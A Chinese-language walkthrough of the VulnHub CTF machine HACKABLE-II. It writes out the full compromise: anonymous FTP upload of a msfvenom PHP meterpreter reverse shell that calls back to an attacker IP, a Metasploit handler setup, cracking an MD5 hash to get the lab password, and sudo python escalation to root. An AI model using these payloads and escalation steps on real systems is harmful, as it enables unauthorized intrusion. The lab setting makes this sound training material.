『vulnhub系列』HACKABLE-II
『vulnhub系列』HACKABLE-II
下载地址:
https://www.vulnhub.com/entry/hackable-ii,711/
信息搜集:
使用nmap探测存活主机,发现主机开启了21,22和80端口
访问80端口的web服务,发现apache默认页面
使用dirsearch进行目录爆破,发现files 目录
dirsearch -u "http://192.168.199.135/"
访问files 页面发现CALL.html
访问CALL.html发现只有一段话
这条路的线索暂时断了,我们使用匿名登录ftp,发现CALL.html
ftp 192.168.199.135
#使用anonymous登录,密码为空
get之后发现就是我们刚刚在files中发现的CALL.html
漏洞利用:
此时我们上传反弹shell(使用msfvenom生成)
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.php
#生成反弹shell
put re_shell.php
#上传反弹shell
进入files文件,发现我们刚刚上传的re_shell.php
我们使用msfconsole进行监听
msfconsole
use exploit/multi/handler
set lhost 192.168.199.129
set payload php/meterpreter/reverse_tcp
run
开启监听后,访问re_shell.php ,反弹成功
进入shell,使用python开启交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
提升权限:
我们在/home中发现了important.txt ,读取发现“运行脚本发现数据”
读取/.runme.sh 发现secret key trolled 还有下面的shrek:cf4c2232354952690368f1b3dfdfb24d
使用md5解密得到密码onion
切换sherk,使用密码onion,登陆成功
获得user.txt
使用sudo -l 查看当前用户可以以root权限执行的命令,发现python命令可以以root权限提权
此时我们使用python 进行提权,成功
sudo python3.5 -c 'import os;os.system("/bin/bash");'
得到root.txt